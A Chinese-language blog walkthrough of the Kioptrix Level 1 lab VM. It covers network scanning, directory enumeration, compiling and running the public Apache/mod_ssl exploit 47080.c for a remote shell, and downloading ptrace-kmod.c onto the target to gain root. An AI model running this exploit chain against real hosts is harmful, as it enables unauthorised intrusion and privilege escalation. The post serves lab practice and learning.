Kioptrix Level 1 (#1)

环境搭建

过程和DC-1的环境搭建一样:https://yschen20.github.io/2026/02/19/DC-1/#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA

渗透测试

先扫靶机 IP

1
nmap -sP 192.168.50.0/24

image-20260401135829606

继续扫靶机的端口服务

1
nmap -A -p- 192.168.50.235

有6个端口,靶机的操作系统是 Red-Hat Linux

image-20260401140056149

先看 80 的 Web 服务

image-20260401140133259

用 dirsearch 扫一下目录

1
dirsearch -u http://192.168.50.235/

image-20260401142340479

先看看test.php,但是发现似乎没有装PHP模块,代码没有执行

image-20260401142439659

访问/manual/是文件列表,其中有一个mod文件夹,并且可以得到中间件是 Apache1.3.20

image-20260403155751850

image-20260403155833116

继续看/mrtg/

image-20260401142635731

还有/usage/,最下面有:Generated by Webalizer Version 2.01,上网搜一下知道 Webalizer 是一个日志分析的程序

image-20260403155858941

之前得到了中间件是Apache/1.3.20,搜索一下相关漏洞

1
searchsploit apache 1.3.20

image-20260403210149223

找一下脚本路径

1
searchsploit -p 47080.c

image-20260403210229406

1
/usr/share/exploitdb/exploits/unix/remote/47080.c

复制到当前目录下

1
cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

image-20260403210419868

编译文件

1
gcc -o 47080 47080.c

不过出现报错

image-20260403210750159

加个选项就好啦

image-20260403211045948

1
gcc -o 470 47080.c -lcrypto

虽然有警告,但是不影响

image-20260403210930680

1
./470 | grep "1.3.20"

image-20260403211548991

1
./470 0x6b 192.168.50.235 -c 40 

成功getshell

image-20260403211654007

image-20260403212054649

但是会发现脚本尝试过提权,但是文件下载失败,就导致没成功提权,本地下载

1
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

image-20260403212222810

然后起一个HTTP服务

1
php -S 0:80

image-20260403212329066

利用 wget 在靶机下载

1
wget http://192.168.50.233/ptrace-kmod.c

image-20260403212503555

然后按照之前脚本提权的命令就行了

1
gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;

image-20260403212612970

总结

通过信息搜集到中间件的版本,然后就是找POC打了


Kioptrix Level 1 (#1)
https://yschen20.github.io/2026/04/03/Kioptrix-Level-1-1/
作者
Suzen
发布于
2026年4月3日
更新于
2026年4月3日
许可协议